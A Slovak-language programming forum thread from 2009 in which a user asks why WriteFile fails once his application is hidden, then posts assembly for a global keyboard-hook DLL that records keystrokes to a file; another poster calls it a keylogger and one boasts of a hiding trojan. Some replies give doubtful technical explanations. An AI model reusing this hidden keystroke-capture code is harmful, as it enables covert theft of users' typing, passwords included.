[ Príspevkov: 12 ] 
AutorSpráva
Offline

Skúsený užívateľ
Skúsený užívateľ
Funkcia WriteFile

Registrovaný: 11.01.09
Prihlásený: 26.01.18
Príspevky: 1290
Témy: 9 | 9
Bydlisko: HE
NapísalOffline : 11.01.2009 20:50 | Funkcia WriteFile

Zdravim, mam mensi problem so zapisom do suboru s funkciou WriteFile. Ja konkretne pouzivam tuto funkciu v assembleri, ale myslim, ze to je jedno. Moj problem je ten, ze ak je aplikacia, z ktorej zapisujem do suboru, viditelna, funguje vsetko spravne, no ak ju skryjem [funkciou ShowWindow(HandleApplikacie, SW_HIDE)], tak mi funkcia nezapisuje do suboru nic. Neviete mi poradit, kde je problem, alebo kde robim chybu?


Offline

Užívateľ
Užívateľ
Obrázok užívateľa

Registrovaný: 28.12.08
Prihlásený: 12.01.09
Príspevky: 78
Témy: 0 | 0
NapísalOffline : 12.01.2009 14:05 | Funkcia WriteFile

...chyba je ze ty okno skryjes...pricom vo windowse plati ze ak je apliakcia skryta tak sa nevykonava WinProc ! => zlyhanie multitaskingu... :rolleyes:
btw aby si to pochopil nato aby mohol program bezat musi byt minimalne minimalizovany v liste alebo v systray-i...myslis si ze preco totalcommander potrebuje byt pri kopirovani minimalizovany alebo si dava ikonu do systray-u... :)

P.S. ak chces neviditelnu aplikaciu tak ju nainstaluj ako sluzbu systemu bez okna v novom threade :-)


Offline

Skúsený užívateľ
Skúsený užívateľ
Funkcia WriteFile

Registrovaný: 11.01.09
Prihlásený: 26.01.18
Príspevky: 1290
Témy: 9 | 9
Bydlisko: HE
Napísal autor témyOffline : 12.01.2009 14:23 | Funkcia WriteFile

OK, diky ti moc za pomoc a za vsvetlenie, takze ja teda prerobim tu aplikaciu na sluzbu, pretoze ona musi byt skryta.


Offline

Skúsený užívateľ
Skúsený užívateľ
Obrázok užívateľa

Registrovaný: 13.11.07
Prihlásený: 20.08.16
Príspevky: 1713
Témy: 0 | 0
NapísalOffline : 12.01.2009 16:23 | Funkcia WriteFile

blackman545 píše:
...
Dosť pochybujem, že je to pravda. Nikdy som nemal problémy s tým, že by aplikácia so skrytým oknom nespracovávala správy (a už vôbec to neovplyvňuje zápis súborov; takže tam musí mať iný problém).


Offline

Užívateľ
Užívateľ
Obrázok užívateľa

Registrovaný: 28.12.08
Prihlásený: 12.01.09
Príspevky: 78
Témy: 0 | 0
NapísalOffline : 12.01.2009 18:00 | Funkcia WriteFile

...skryte okno funguje vtedy ak mas este jedno rodicovske okno nad tym ktore to skryte okno ovlada alebo je ovladane ako service... :rolleyes:
btw ak nemas napisany kod ako service tak windows posiela do vsetkych okien iba systemove spravy typu WM_QUIT a podobne ktore maju vplyv na tu aplikaciu... :)

Citácia:
The WaitMessage function yields control to other threads when a thread has no other messages in its message queue. The WaitMessage function suspends the thread and does not return until a new message is placed in the thread's message queue.


P.S. do slucky je posielana iba WM_TIMER a podobne z window-based sprav(ktore vznikaju nezavisle od okna)...vsetky window-based spravy su posielane iba sluzbam, oknam napisanym ako sluzby a AKTIVNEMU OKNU(to ktore ma focus) zprava dolava...=> ak by to tak nebolo tak napriklad stlacenim CTRL+C by som neskopiroval obsah iba tohoto okna ale aj vsetkych ktore mam momentalne teraz v pozadi... :-D


Offline

Užívateľ
Užívateľ
Obrázok užívateľa

Registrovaný: 13.01.09
Prihlásený: 13.01.09
Príspevky: 4
Témy: 0 | 0
NapísalOffline : 13.01.2009 21:50 | Funkcia WriteFile

To je divne urcite to skrytim nie je napr. moj trojan sa skryje a ide dalej (uspesne :D)


Offline

Skúsený užívateľ
Skúsený užívateľ
Obrázok užívateľa

Registrovaný: 13.11.07
Prihlásený: 20.08.16
Príspevky: 1713
Témy: 0 | 0
NapísalOffline : 16.01.2009 20:24 | Funkcia WriteFile

blackman545 píše:
...
Aplikácia so skrytým oknom funguje aj ďalej. Samozrejme je logické, že musíš chcieť, aby niečo robila. Ak jej prestaneš posielať správy (a nemáš tam žiadnu priblblú funkciu, ktorá by robila to, čo sa robiť nemá a teda by v nej bol nejaký nekonečný cyklus) tak je logické, že nič robiť nebude (rovnako, ako ti napr. textový editor nenapíše román sám od seba po tom ako ho zapneš). ;)


Offline

Skúsený užívateľ
Skúsený užívateľ
Funkcia WriteFile

Registrovaný: 11.01.09
Prihlásený: 26.01.18
Príspevky: 1290
Témy: 9 | 9
Bydlisko: HE
Napísal autor témyOffline : 18.01.2009 11:21 | Funkcia WriteFile

Skúšal som to spraviť všelijak, ale akosi mi to stále nejde. Napíšem vám tú hlavnú časť kódu a možno vám to viac pomôže.
V tejto aplikácii ide proste o zápis hodnoty stlačeného klávesu do súboru. Všetko sa odohráva v knižnici, kde je umiestnená funkcia háku typu WH_KEYBOARD.
Výpis:

Kód:

Hook PROC EXPORT

    push ebp
    mov ebp, esp
    push ebx

    push DWORD PTR [ebp + 10h]
    push DWORD PTR [ebp + 0Ch]
    push DWORD PTR [ebp + 08h]
    push [_hHook]
    call CallNextHookEx@16

    mov ebx, offset buffer
    mov al, BYTE PTR [ebp + 0Ch]
    mov [ebx], al

; ak bol klaves uvolneny, koniec

    mov eax, DWORD PTR [ebp + 10h]
    and eax, 80000000h
    cmp eax, 80000000h
    je _EXI


; zapis do suboru

    push 0
    push offset bytesWritten
    push 1
    push offset buffer
    push _hFile
    call WriteFile@20

    jmp _EXI

_EXI:

    pop ebx
    pop ebp
    ret 0

Hook ENDP



Ak je aplikácia aktívna, všetko funguje presne ako má. No stačí, že aplikácia prestane byť aktívna (to znamená, že je viditeľná, nie je SKRYTÁ), tak sa do súboru nič nezapíše. Ak dám namiesto funkcie WriteFile napríklad funkciu MessageBoxA, tak mi vyskočí správa messagebox-u, aj keď je aplikácia neaktívna, dokonca aj keď je skrytá!

Snáď vám to teraz trochu viac pomôže. Vopred ďakujem za odpoveď :-)


Offline

Užívateľ
Užívateľ
Funkcia WriteFile

Registrovaný: 19.09.06
Prihlásený: 18.12.17
Príspevky: 749
Témy: 31 | 31
Bydlisko: Ružomberok&...
NapísalOffline : 18.01.2009 11:47 | Funkcia WriteFile

Podla mna by si mal nastavit pomocou SetWindowsHookEx globalny hook na tie spravy, ktore chces prijimat. Lebo teraz odchytavas len spravy prijimane aplikaciou.


Offline

Skúsený užívateľ
Skúsený užívateľ
Funkcia WriteFile

Registrovaný: 11.01.09
Prihlásený: 26.01.18
Príspevky: 1290
Témy: 9 | 9
Bydlisko: HE
Napísal autor témyOffline : 18.01.2009 12:42 | Funkcia WriteFile

Iba typy hákov WH_JOURNALRECORD a WH_JOURNALPLAYBACK nie sú pre globálne háky, teda WH_KEYBOARD "odchytáva" kl´=avesy kdekoľvek v systéme. A aj vyššie som popísal, že ak použijem napr funkciu MessageBoxA, tak mi správa (s ASCII klávesu napríklad) vybehne vždy, aj mimo aplikácie.


Offline

Užívateľ
Užívateľ
Obrázok užívateľa

Registrovaný: 20.11.07
Prihlásený: 04.07.12
Príspevky: 405
Témy: 89 | 89
NapísalOffline : 25.01.2009 22:39 | Funkcia WriteFile

to si popisujete o keoggeroch len tak)???


Offline

Skúsený užívateľ
Skúsený užívateľ
Funkcia WriteFile

Registrovaný: 11.01.09
Prihlásený: 26.01.18
Príspevky: 1290
Témy: 9 | 9
Bydlisko: HE
Napísal autor témyOffline : 26.01.2009 15:22 | Funkcia WriteFile

Ako si prišiel na to, že je to keylogger? :shock: Čo ak potrebujem iba zistiť, koľko krát boli stlačené dané klávesy, ktorých výskyt čítam práve zo súboru. Hmm? A aj keby to bol keylogger, pýtal som si radu, nie mravné poučenia, ak mi nevieš poradiť, tak to nemusíš komentovať, OK? ;) Dík za pochopenie.


 [ Príspevkov: 12 ] 


Funkcia WriteFile



Podobné témy

 Témy  Odpovede  Zobrazenia  Posledný príspevok 
V tomto fóre nie sú ďalšie neprečítané témy.

funkcia

v Assembler, C, C++, Pascal, Java

1

463

10.02.2009 21:20

Fico

Táto téma je zamknutá, nemôžete posielať nové príspevky alebo odpovedať na staršie.

funkcia

v PHP, ASP

2

155

25.03.2014 17:42

shaggy

V tomto fóre nie sú ďalšie neprečítané témy.

Funkcia

v PHP, ASP

6

620

06.11.2007 15:45

Orwell

V tomto fóre nie sú ďalšie neprečítané témy.

funkcia....

v PHP, ASP

1

449

30.08.2008 20:44

p360t

V tomto fóre nie sú ďalšie neprečítané témy.

funkcia

v Assembler, C, C++, Pascal, Java

3

472

29.04.2009 20:31

stopa27

V tomto fóre nie sú ďalšie neprečítané témy.

Funkcia

v PHP, ASP

12

588

24.04.2008 18:37

Triminka

V tomto fóre nie sú ďalšie neprečítané témy.

[C] funkcia

v Assembler, C, C++, Pascal, Java

12

274

11.01.2015 21:01

nBXXL

V tomto fóre nie sú ďalšie neprečítané témy.

nefunguje funkcia

v JavaScript, VBScript, Ajax

3

274

19.03.2011 12:31

Ďuri

V tomto fóre nie sú ďalšie neprečítané témy.

funkcia php

v PHP, ASP

4

297

07.06.2012 17:09

Mysql_dodo

V tomto fóre nie sú ďalšie neprečítané témy.

ciselna funkcia

v PHP, ASP

7

375

05.05.2008 14:10

juho

V tomto fóre nie sú ďalšie neprečítané témy.

funkcia strstr

v PHP, ASP

4

490

10.03.2008 8:23

stenley

V tomto fóre nie sú ďalšie neprečítané témy.

hash funkcia

v Assembler, C, C++, Pascal, Java

3

863

27.11.2009 18:38

johny3212

V tomto fóre nie sú ďalšie neprečítané témy.

J2ME funkcia?

v Assembler, C, C++, Pascal, Java

2

356

05.11.2008 19:13

idiotart

V tomto fóre nie sú ďalšie neprečítané témy.

Funkcia Moda

v Krčma

6

394

14.10.2011 16:39

Denco1

V tomto fóre nie sú ďalšie neprečítané témy.

funkcia - argumenty

v PHP, ASP

2

311

26.09.2008 17:50

m4r14n

V tomto fóre nie sú ďalšie neprečítané témy.

Funkcia Uspat.

v Operačné systémy Microsoft

5

366

11.07.2011 23:12

ffeerroo



© 2005 - 2018 PCforum, edited by JanoF